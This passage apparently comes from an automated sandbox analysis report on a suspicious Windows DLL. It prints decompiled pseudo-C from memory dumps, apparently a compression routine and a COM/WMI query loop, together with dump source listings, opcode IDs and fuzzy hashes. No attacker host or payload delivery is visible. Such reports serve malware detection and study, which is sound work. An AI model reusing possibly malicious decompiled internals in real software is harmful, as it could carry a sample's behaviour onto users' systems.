                                                                                                                                                                                                									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                                									_t94 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                                									_t95 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                                									_t96 = _t223 + 0x16b9; // 0xc35d5b5e
                                                                                                                                                                                                									 *((char*)( *_t94 +  *_t95)) =  *_t96;
                                                                                                                                                                                                									_t100 = _t223 + 0x16bc; // 0xec8b55c3
                                                                                                                                                                                                									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                                									_t361 = _v24 >> 0x10;
                                                                                                                                                                                                									_t402 =  *_t100 + 0xfffffff0;
                                                                                                                                                                                                								}
                                                                                                                                                                                                								_t403 = _t402 + _t245;
                                                                                                                                                                                                								_t362 = _t361 & 0x0000ffff;
                                                                                                                                                                                                								 *(_t223 + 0x16bc) = _t403;
                                                                                                                                                                                                								 *(_t223 + 0x16b8) = _t362;
                                                                                                                                                                                                								_t363 = _t362 & 0x0000ffff;
                                                                                                                                                                                                								if(_t403 <= 0xe) {
                                                                                                                                                                                                									_t121 = _t403 + 2; // 0xec8b55c5
                                                                                                                                                                                                									_t275 = _t121;
                                                                                                                                                                                                									goto L28;
                                                                                                                                                                                                								} else {
                                                                                                                                                                                                									_t394 = _t388 + 0xfffffffd;
                                                                                                                                                                                                									_t105 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                                									_t248 = _t394 << _t403 | _t363;
                                                                                                                                                                                                									_t106 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                                									 *(_t223 + 0x16b8) = _t248;
                                                                                                                                                                                                									 *( *_t106 +  *_t105) = _t248;
                                                                                                                                                                                                									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                                									_t111 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                                									_t112 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                                									_t113 = _t223 + 0x16b9; // 0xc35d5b5e
                                                                                                                                                                                                									 *((char*)( *_t111 +  *_t112)) =  *_t113;
                                                                                                                                                                                                									 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                                									 *(_t223 + 0x16bc) =  *(_t223 + 0x16bc) + 0xfffffff2;
                                                                                                                                                                                                									 *(_t223 + 0x16b8) = _t394 >> 0x00000010 & 0x0000ffff;
                                                                                                                                                                                                									goto L35;
                                                                                                                                                                                                								}
                                                                                                                                                                                                							} else {
                                                                                                                                                                                                								_t316 = _t223 + (_t235 + 0x29f) * 4;
                                                                                                                                                                                                								_v28 = _t316;
                                                                                                                                                                                                								do {
                                                                                                                                                                                                									_t378 = _a12;
                                                                                                                                                                                                									_t22 = _t223 + 0x16bc; // 0xec8b55c3
                                                                                                                                                                                                									_t409 =  *_t22;
                                                                                                                                                                                                									_t24 = _t378 * 4; // 0x5dc033c3
                                                                                                                                                                                                									_t250 =  *(_t223 + _t24 + 0xa7e) & 0x0000ffff;
                                                                                                                                                                                                									_t379 =  *_t316 & 0x0000ffff;
                                                                                                                                                                                                									_v24 = _t379;
                                                                                                                                                                                                									_t27 = _t223 + 0x16b8; // 0x5d5b5e5f
                                                                                                                                                                                                									_t382 = (_t379 << _t409 |  *_t27) & 0x0000ffff;
                                                                                                                                                                                                									_v20 = _t382;
                                                                                                                                                                                                									if(_t409 <= 0x10 - _t250) {
                                                                                                                                                                                                										_t321 = _t409 + _t250;
                                                                                                                                                                                                									} else {
                                                                                                                                                                                                										_t29 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                                										 *(_t223 + 0x16b8) = _t382;
                                                                                                                                                                                                										_t31 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                                										 *((char*)( *_t31 +  *_t29)) = _v20;
                                                                                                                                                                                                										_t223 = _a4;
                                                                                                                                                                                                										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                                										_t37 = _t223 + 0x14; // 0xc703f045
                                                                                                                                                                                                										_t38 = _t223 + 8; // 0x8d000040
                                                                                                                                                                                                										_t39 = _t223 + 0x16b9; // 0xc35d5b5e
                                                                                                                                                                                                										 *((char*)( *_t37 +  *_t38)) =  *_t39;
                                                                                                                                                                                                										 *((intOrPtr*)(_t223 + 0x14)) =  *((intOrPtr*)(_t223 + 0x14)) + 1;
                                                                                                                                                                                                										_t382 = _v24 >> 0x10;
                                                                                                                                                                                                										_t45 = _t223 + 0x16bc; // 0xec8b55c3
                                                                                                                                                                                                										_t321 =  *_t45 + 0xfffffff0 + _t250;
                                                                                                                                                                                                									}
                                                                                                                                                                                                									 *(_t223 + 0x16bc) = _t321;
                                                                                                                                                                                                									_t316 = _v28;
                                                                                                                                                                                                									 *(_t223 + 0x16b8) = _t382 & 0x0000ffff;
                                                                                                                                                                                                									_t388 = _t388 - 1;
                                                                                                                                                                                                								} while (_t388 != 0);
                                                                                                                                                                                                								L35:
                                                                                                                                                                                                								_t235 = _v8;
                                                                                                                                                                                                								_t388 = 0;
                                                                                                                                                                                                								_t398 = _a12;
                                                                                                                                                                                                								if(_t235 != 0) {
                                                                                                                                                                                                									if(_a8 != _t235) {
                                                                                                                                                                                                										_t329 = 7;
                                                                                                                                                                                                										_t217 = _t329 - 3; // 0x4
                                                                                                                                                                                                										_t254 = _t217;
                                                                                                                                                                                                									} else {
                                                                                                                                                                                                										_t329 = 6;
                                                                                                                                                                                                										_t216 = _t329 - 3; // 0x3
                                                                                                                                                                                                										_t254 = _t216;
                                                                                                                                                                                                									}
                                                                                                                                                                                                								} else {
                                                                                                                                                                                                									_t329 = 0x8a;
                                                                                                                                                                                                									_t214 = _t388 + 3; // 0x3
                                                                                                                                                                                                									_t254 = _t214;
                                                                                                                                                                                                								}
                                                                                                                                                                                                								goto L41;
                                                                                                                                                                                                							}
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t223 = _a4;
                                                                                                                                                                                                						if(_t235 == _v8) {
                                                                                                                                                                                                							_t235 = _v8;
                                                                                                                                                                                                							goto L41;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						goto L4;
                                                                                                                                                                                                						L41:
                                                                                                                                                                                                						_v12 =  &(_v12[2]);
                                                                                                                                                                                                						_t221 =  &_v16;
                                                                                                                                                                                                						 *_t221 = _v16 - 1;
                                                                                                                                                                                                					} while ( *_t221 != 0);
                                                                                                                                                                                                					goto L42;
                                                                                                                                                                                                				}
                                                                                                                                                                                                			}
                                                                                                                                                                                                0x10017353
                                                                                                                                                                                                0x1001735c
                                                                                                                                                                                                0x1001735f
                                                                                                                                                                                                0x10017362
                                                                                                                                                                                                0x10017369
                                                                                                                                                                                                0x1001736c
                                                                                                                                                                                                0x1001736f
                                                                                                                                                                                                0x10017372
                                                                                                                                                                                                0x10017375
                                                                                                                                                                                                0x1001737b
                                                                                                                                                                                                0x10017386
                                                                                                                                                                                                0x1001738c
                                                                                                                                                                                                0x10017393
                                                                                                                                                                                                0x10017393
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1001734e
                                                                                                                                                                                                0x100171b2
                                                                                                                                                                                                0x100171b2
                                                                                                                                                                                                0x100171b9
                                                                                                                                                                                                0x100171b9
                                                                                                                                                                                                0x100171c2
                                                                                                                                                                                                0x100171cf
                                                                                                                                                                                                0x100171d8
                                                                                                                                                                                                0x100171db
                                                                                                                                                                                                0x100171e0
                                                                                                                                                                                                0x100171e2
                                                                                                                                                                                                0x100171e5
                                                                                                                                                                                                0x100171ec
                                                                                                                                                                                                0x100171f2
                                                                                                                                                                                                0x100171f5
                                                                                                                                                                                                0x100171f8
                                                                                                                                                                                                0x100171fb
                                                                                                                                                                                                0x100171fe
                                                                                                                                                                                                0x10017201
                                                                                                                                                                                                0x10017207
                                                                                                                                                                                                0x10017215
                                                                                                                                                                                                0x1001721b
                                                                                                                                                                                                0x1001721e
                                                                                                                                                                                                0x10017221
                                                                                                                                                                                                0x10017221
                                                                                                                                                                                                0x10017224
                                                                                                                                                                                                0x10017226
                                                                                                                                                                                                0x10017229
                                                                                                                                                                                                0x1001722f
                                                                                                                                                                                                0x10017236
                                                                                                                                                                                                0x1001723c
                                                                                                                                                                                                0x10017295
                                                                                                                                                                                                0x10017295
                                                                                                                                                                                                0x10017298
                                                                                                                                                                                                0x10017298
                                                                                                                                                                                                0x1001729e
                                                                                                                                                                                                0x100172a6
                                                                                                                                                                                                0x100172b3
                                                                                                                                                                                                0x1001723e
                                                                                                                                                                                                0x1001723e
                                                                                                                                                                                                0x10017249
                                                                                                                                                                                                0x1001724c
                                                                                                                                                                                                0x1001724f
                                                                                                                                                                                                0x10017252
                                                                                                                                                                                                0x10017259
                                                                                                                                                                                                0x1001725c
                                                                                                                                                                                                0x1001725f
                                                                                                                                                                                                0x10017262
                                                                                                                                                                                                0x10017265
                                                                                                                                                                                                0x1001726b
                                                                                                                                                                                                0x10017277
                                                                                                                                                                                                0x1001727c
                                                                                                                                                                                                0x10017289
                                                                                                                                                                                                0x10017289
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x1001723c
                                                                                                                                                                                                0x1001701a
                                                                                                                                                                                                0x1001701f
                                                                                                                                                                                                0x10017025
                                                                                                                                                                                                0x10017025
                                                                                                                                                                                                0x1001702d
                                                                                                                                                                                                0x1001702d
                                                                                                                                                                                                0x10017035
                                                                                                                                                                                                0x10017035
                                                                                                                                                                                                0x1001703d
                                                                                                                                                                                                0x1001704a
                                                                                                                                                                                                0x10017053
                                                                                                                                                                                                0x10017058
                                                                                                                                                                                                0x1001709d
                                                                                                                                                                                                0x1001709f
                                                                                                                                                                                                0x1001705a
                                                                                                                                                                                                0x1001705a
                                                                                                                                                                                                0x1001705d
                                                                                                                                                                                                0x10017060
                                                                                                                                                                                                0x10017067
                                                                                                                                                                                                0x1001706a
                                                                                                                                                                                                0x1001706d
                                                                                                                                                                                                0x10017070
                                                                                                                                                                                                0x10017073
                                                                                                                                                                                                0x10017079
                                                                                                                                                                                                0x10017087
                                                                                                                                                                                                0x1001708d
                                                                                                                                                                                                0x10017096
                                                                                                                                                                                                0x10017099
                                                                                                                                                                                                0x10017099
                                                                                                                                                                                                0x100170a2
                                                                                                                                                                                                0x100170a5
                                                                                                                                                                                                0x100170ab
                                                                                                                                                                                                0x100170ab
                                                                                                                                                                                                0x100170b2
                                                                                                                                                                                                0x100170b2
                                                                                                                                                                                                0x100170b9
                                                                                                                                                                                                0x100170b9
                                                                                                                                                                                                0x100170c1
                                                                                                                                                                                                0x100170c1
                                                                                                                                                                                                0x100170c8
                                                                                                                                                                                                0x100170d5
                                                                                                                                                                                                0x100170de
                                                                                                                                                                                                0x100170e1
                                                                                                                                                                                                0x100170e6
                                                                                                                                                                                                0x100170e8
                                                                                                                                                                                                0x100170eb
                                                                                                                                                                                                0x100170f2
                                                                                                                                                                                                0x100170f8
                                                                                                                                                                                                0x100170fb
                                                                                                                                                                                                0x100170fe
                                                                                                                                                                                                0x10017101
                                                                                                                                                                                                0x10017104
                                                                                                                                                                                                0x10017107
                                                                                                                                                                                                0x1001710d
                                                                                                                                                                                                0x1001711b
                                                                                                                                                                                                0x10017121
                                                                                                                                                                                                0x10017124
                                                                                                                                                                                                0x10017127
                                                                                                                                                                                                0x10017127
                                                                                                                                                                                                0x1001712a
                                                                                                                                                                                                0x1001712c
                                                                                                                                                                                                0x1001712f
                                                                                                                                                                                                0x10017135
                                                                                                                                                                                                0x1001713c
                                                                                                                                                                                                0x10017142
                                                                                                                                                                                                0x1001719b
                                                                                                                                                                                                0x1001719b

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
                                                                                                                                                                                                • Instruction ID: 5b0f1481b3507e53faa68fea0c4d4dce0c644c93c0065929635aa94c1f82f527
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0050a3338128a3e29d0738b8ec7b1954f4e7d535beab72997c1b6becb188d890
                                                                                                                                                                                                • Instruction Fuzzy Hash: 5BF16D755092118FC709CF28C4D48F97BF1FFA9310B1A82F9D8999B3A6D731A980CB91
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: e5067ce0d69c97c32a38e7aeb3fef6c0114ffe29ce053d50af88417ef7cc46d5
                                                                                                                                                                                                • Instruction ID: 90d23c0658679a52155eb39e6254ce444f14c2fdf9d5de364fde577eb9212e47
                                                                                                                                                                                                • Opcode Fuzzy Hash: e5067ce0d69c97c32a38e7aeb3fef6c0114ffe29ce053d50af88417ef7cc46d5
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3B7114756201758FE704CF6ADCD09BA33A1E78E34138AC619FA41CF395C535E626DBA0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: a6537fa0602603724b16c29000722af37df582b2c80d40423e3c4ba9a4a91a1a
                                                                                                                                                                                                • Instruction ID: 1da37d57835d9cab1afde3d64822888ff80288cca5f41f047eaea9f02bbf5adc
                                                                                                                                                                                                • Opcode Fuzzy Hash: a6537fa0602603724b16c29000722af37df582b2c80d40423e3c4ba9a4a91a1a
                                                                                                                                                                                                • Instruction Fuzzy Hash: A15168B3B041B00BDF5CCE3E8C642757ED25AC515670EC2B6E9A9CF24AE978C7059760
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.389072703.000000001006B000.00000040.00020000.sdmp, Offset: 1006B000, based on PE: false
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                                                                                                                                                                                • Instruction ID: 94c65a7d2af16b431307d3a72fe19380af7a04fcf923a85705189e20b060aea8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2473ecba5f78466b236b706d564a53f6938cb11cd03c01b5ec765ffc181c916c
                                                                                                                                                                                                • Instruction Fuzzy Hash: 051181B33405049FD754CE59EC91EA6B3DAEB88270B258066ED04CB315D7B6E841C7A0
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.389072703.000000001006B000.00000040.00020000.sdmp, Offset: 1006B000, based on PE: false
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 50%
                                                                                                                                                                                                			E1000DB7E(intOrPtr __ecx, intOrPtr __edx, void* __eflags, intOrPtr _a4) {
                                                                                                                                                                                                				signed int _v12;
                                                                                                                                                                                                				signed int _v16;
                                                                                                                                                                                                				signed int _v20;
                                                                                                                                                                                                				char _v24;
                                                                                                                                                                                                				void* _v28;
                                                                                                                                                                                                				signed int _v32;
                                                                                                                                                                                                				char _v36;
                                                                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                                                                				signed int _v44;
                                                                                                                                                                                                				char _v48;
                                                                                                                                                                                                				char _v52;
                                                                                                                                                                                                				intOrPtr _v56;
                                                                                                                                                                                                				signed int _v60;
                                                                                                                                                                                                				char* _v72;
                                                                                                                                                                                                				signed short _v80;
                                                                                                                                                                                                				signed int _v84;
                                                                                                                                                                                                				char _v88;
                                                                                                                                                                                                				char _v92;
                                                                                                                                                                                                				char _v96;
                                                                                                                                                                                                				intOrPtr _v100;
                                                                                                                                                                                                				char _v104;
                                                                                                                                                                                                				char _v616;
                                                                                                                                                                                                				intOrPtr* _t159;
                                                                                                                                                                                                				char _t165;
                                                                                                                                                                                                				signed int _t166;
                                                                                                                                                                                                				signed int _t173;
                                                                                                                                                                                                				signed int _t178;
                                                                                                                                                                                                				signed int _t186;
                                                                                                                                                                                                				intOrPtr* _t187;
                                                                                                                                                                                                				signed int _t188;
                                                                                                                                                                                                				signed int _t192;
                                                                                                                                                                                                				intOrPtr* _t193;
                                                                                                                                                                                                				intOrPtr _t200;
                                                                                                                                                                                                				intOrPtr* _t205;
                                                                                                                                                                                                				signed int _t207;
                                                                                                                                                                                                				signed int _t209;
                                                                                                                                                                                                				intOrPtr* _t210;
                                                                                                                                                                                                				intOrPtr _t212;
                                                                                                                                                                                                				intOrPtr* _t213;
                                                                                                                                                                                                				signed int _t214;
                                                                                                                                                                                                				char _t217;
                                                                                                                                                                                                				signed int _t218;
                                                                                                                                                                                                				signed int _t219;
                                                                                                                                                                                                				signed int _t230;
                                                                                                                                                                                                				signed int _t235;
                                                                                                                                                                                                				signed int _t242;
                                                                                                                                                                                                				signed int _t243;
                                                                                                                                                                                                				signed int _t244;
                                                                                                                                                                                                				signed int _t245;
                                                                                                                                                                                                				intOrPtr* _t247;
                                                                                                                                                                                                				intOrPtr* _t251;
                                                                                                                                                                                                				signed int _t252;
                                                                                                                                                                                                				intOrPtr* _t253;
                                                                                                                                                                                                				void* _t255;
                                                                                                                                                                                                				intOrPtr* _t261;
                                                                                                                                                                                                				signed int _t262;
                                                                                                                                                                                                				signed int _t283;
                                                                                                                                                                                                				signed int _t289;
                                                                                                                                                                                                				char* _t298;
                                                                                                                                                                                                				void* _t320;
                                                                                                                                                                                                				signed int _t322;
                                                                                                                                                                                                				intOrPtr* _t323;
                                                                                                                                                                                                				intOrPtr _t324;
                                                                                                                                                                                                				signed int _t327;
                                                                                                                                                                                                				intOrPtr* _t328;
                                                                                                                                                                                                				intOrPtr* _t329;
                                                                                                                                                                                                
                                                                                                                                                                                                				_v32 = _v32 & 0x00000000;
                                                                                                                                                                                                				_v60 = _v60 & 0x00000000;
                                                                                                                                                                                                				_v56 = __edx;
                                                                                                                                                                                                				_v100 = __ecx;
                                                                                                                                                                                                				_t159 = E1000D565(__ecx);
                                                                                                                                                                                                				_t251 = _t159;
                                                                                                                                                                                                				_v104 = _t251;
                                                                                                                                                                                                				if(_t251 == 0) {
                                                                                                                                                                                                					return _t159;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t320 = E100085E5(0x10);
                                                                                                                                                                                                				_v36 = _t320;
                                                                                                                                                                                                				_pop(_t255);
                                                                                                                                                                                                				if(_t320 == 0) {
                                                                                                                                                                                                					L53:
                                                                                                                                                                                                					E100085FB( &_v60, 0xfffffffe);
                                                                                                                                                                                                					E1000D619( &_v104);
                                                                                                                                                                                                					return _t320;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t165 = E100095C2(_t255, 0x536);
                                                                                                                                                                                                				 *_t328 = 0x609;
                                                                                                                                                                                                				_v52 = _t165;
                                                                                                                                                                                                				_t166 = E100095C2(_t255);
                                                                                                                                                                                                				_push(0);
                                                                                                                                                                                                				_push(_v56);
                                                                                                                                                                                                				_v20 = _t166;
                                                                                                                                                                                                				_push(_t166);
                                                                                                                                                                                                				_push(_a4);
                                                                                                                                                                                                				_t322 = E100092C6(_t165);
                                                                                                                                                                                                				_v60 = _t322;
                                                                                                                                                                                                				E100085B6( &_v52);
                                                                                                                                                                                                				E100085B6( &_v20);
                                                                                                                                                                                                				_t329 = _t328 + 0x20;
                                                                                                                                                                                                				if(_t322 != 0) {
                                                                                                                                                                                                					_t323 = __imp__#2;
                                                                                                                                                                                                					_v40 =  *_t323(_t322);
                                                                                                                                                                                                					_t173 = E100095C2(_t255, 0x9e4);
                                                                                                                                                                                                					_v20 = _t173;
                                                                                                                                                                                                					_v52 =  *_t323(_t173);
                                                                                                                                                                                                					E100085B6( &_v20);
                                                                                                                                                                                                					_t324 = _v40;
                                                                                                                                                                                                					_t261 =  *_t251;
                                                                                                                                                                                                					_t252 = 0;
                                                                                                                                                                                                					_t178 =  *((intOrPtr*)( *_t261 + 0x50))(_t261, _v52, _t324, 0, 0,  &_v32);
                                                                                                                                                                                                					__eflags = _t178;
                                                                                                                                                                                                					if(_t178 != 0) {
                                                                                                                                                                                                						L52:
                                                                                                                                                                                                						__imp__#6(_t324);
                                                                                                                                                                                                						__imp__#6(_v52);
                                                                                                                                                                                                						goto L53;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_t262 = _v32;
                                                                                                                                                                                                					_v28 = 0;
                                                                                                                                                                                                					_v20 = 0;
                                                                                                                                                                                                					__eflags = _t262;
                                                                                                                                                                                                					if(_t262 == 0) {
                                                                                                                                                                                                						L49:
                                                                                                                                                                                                						 *((intOrPtr*)( *_t262 + 8))(_t262);
                                                                                                                                                                                                						__eflags = _t252;
                                                                                                                                                                                                						if(_t252 == 0) {
                                                                                                                                                                                                							E100085FB( &_v36, 0);
                                                                                                                                                                                                							_t320 = _v36;
                                                                                                                                                                                                						} else {
                                                                                                                                                                                                							 *(_t320 + 8) = _t252;
                                                                                                                                                                                                							 *_t320 = E100091C4(_v100);
                                                                                                                                                                                                							 *((intOrPtr*)(_t320 + 4)) = E100091C4(_v56);
                                                                                                                                                                                                						}
                                                                                                                                                                                                						goto L52;
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						goto L6;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					while(1) {
                                                                                                                                                                                                						L6:
                                                                                                                                                                                                						_t186 =  *((intOrPtr*)( *_t262 + 0x10))(_t262, 0xea60, 1,  &_v28,  &_v84);
                                                                                                                                                                                                						__eflags = _t186;
                                                                                                                                                                                                						if(_t186 != 0) {
                                                                                                                                                                                                							break;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_v16 = 0;
                                                                                                                                                                                                						_v48 = 0;
                                                                                                                                                                                                						_v12 = 0;
                                                                                                                                                                                                						_v24 = 0;
                                                                                                                                                                                                						__eflags = _v84;
                                                                                                                                                                                                						if(_v84 == 0) {
                                                                                                                                                                                                							break;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t187 = _v28;
                                                                                                                                                                                                						_t188 =  *((intOrPtr*)( *_t187 + 0x1c))(_t187, 0, 0x40, 0,  &_v24);
                                                                                                                                                                                                						__eflags = _t188;
                                                                                                                                                                                                						if(_t188 >= 0) {
                                                                                                                                                                                                							__imp__#20(_v24, 1,  &_v16);
                                                                                                                                                                                                							__imp__#19(_v24, 1,  &_v48);
                                                                                                                                                                                                							_t46 = _t320 + 0xc; // 0xc
                                                                                                                                                                                                							_t253 = _t46;
                                                                                                                                                                                                							_t327 = _t252 << 3;
                                                                                                                                                                                                							_t47 = _t327 + 8; // 0x8
                                                                                                                                                                                                							_t192 = E10008679(_t327, _t47);
                                                                                                                                                                                                							__eflags = _t192;
                                                                                                                                                                                                							if(_t192 == 0) {
                                                                                                                                                                                                								__imp__#16(_v24);
                                                                                                                                                                                                								_t193 = _v28;
                                                                                                                                                                                                								 *((intOrPtr*)( *_t193 + 8))(_t193);
                                                                                                                                                                                                								L46:
                                                                                                                                                                                                								_t252 = _v20;
                                                                                                                                                                                                								break;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							 *(_t327 +  *_t253) = _v48 - _v16 + 1;
                                                                                                                                                                                                							 *((intOrPtr*)(_t327 +  *_t253 + 4)) = E100085E5( *(_t327 +  *_t253) << 3);
                                                                                                                                                                                                							_t200 =  *_t253;
                                                                                                                                                                                                							__eflags =  *(_t327 + _t200 + 4);
                                                                                                                                                                                                							if( *(_t327 + _t200 + 4) == 0) {
                                                                                                                                                                                                								_t136 = _t320 + 0xc; // 0xc
                                                                                                                                                                                                								E100085FB(_t136, 0);
                                                                                                                                                                                                								E100085FB( &_v36, 0);
                                                                                                                                                                                                								__imp__#16(_v24);
                                                                                                                                                                                                								_t205 = _v28;
                                                                                                                                                                                                								 *((intOrPtr*)( *_t205 + 8))(_t205);
                                                                                                                                                                                                								_t320 = _v36;
                                                                                                                                                                                                								goto L46;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							_t207 = _v16;
                                                                                                                                                                                                							while(1) {
                                                                                                                                                                                                								_v12 = _t207;
                                                                                                                                                                                                								__eflags = _t207 - _v48;
                                                                                                                                                                                                								if(_t207 > _v48) {
                                                                                                                                                                                                									break;
                                                                                                                                                                                                								}
                                                                                                                                                                                                								_v44 = _v44 & 0x00000000;
                                                                                                                                                                                                								_t209 =  &_v12;
                                                                                                                                                                                                								__imp__#25(_v24, _t209,  &_v44);
                                                                                                                                                                                                								__eflags = _t209;
                                                                                                                                                                                                								if(_t209 < 0) {
                                                                                                                                                                                                									break;
                                                                                                                                                                                                								}
                                                                                                                                                                                                								_t212 = E100091C4(_v44);
                                                                                                                                                                                                								 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + (_v12 - _v16) * 8)) = _t212;
                                                                                                                                                                                                								_t213 = _v28;
                                                                                                                                                                                                								_t281 =  *_t213;
                                                                                                                                                                                                								_t214 =  *((intOrPtr*)( *_t213 + 0x10))(_t213, _v44, 0,  &_v80, 0, 0);
                                                                                                                                                                                                								__eflags = _t214;
                                                                                                                                                                                                								if(_t214 < 0) {
                                                                                                                                                                                                									L39:
                                                                                                                                                                                                									__imp__#6(_v44);
                                                                                                                                                                                                									_t207 = _v12 + 1;
                                                                                                                                                                                                									__eflags = _t207;
                                                                                                                                                                                                									continue;
                                                                                                                                                                                                								}
                                                                                                                                                                                                								_v92 = E100095C2(_t281, 0x250);
                                                                                                                                                                                                								 *_t329 = 0x4cc;
                                                                                                                                                                                                								_t217 = E100095C2(_t281);
                                                                                                                                                                                                								_t283 = _v80;
                                                                                                                                                                                                								_v96 = _t217;
                                                                                                                                                                                                								_t218 = _t283 & 0x0000ffff;
                                                                                                                                                                                                								__eflags = _t218 - 0xb;
                                                                                                                                                                                                								if(__eflags > 0) {
                                                                                                                                                                                                									_t219 = _t218 - 0x10;
                                                                                                                                                                                                									__eflags = _t219;
                                                                                                                                                                                                									if(_t219 == 0) {
                                                                                                                                                                                                										L35:
                                                                                                                                                                                                										 *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8)) = E100085E5(0x18);
                                                                                                                                                                                                										_t289 =  *((intOrPtr*)( *((intOrPtr*)(_t327 +  *_t253 + 4)) + 4 + (_v12 - _v16) * 8));
                                                                                                                                                                                                										__eflags = _t289;
                                                                                                                                                                                                										if(_t289 == 0) {
                                                                                                                                                                                                											L38:
                                                                                                                                                                                                											E100085B6( &_v92);
                                                                                                                                                                                                											E100085B6( &_v96);
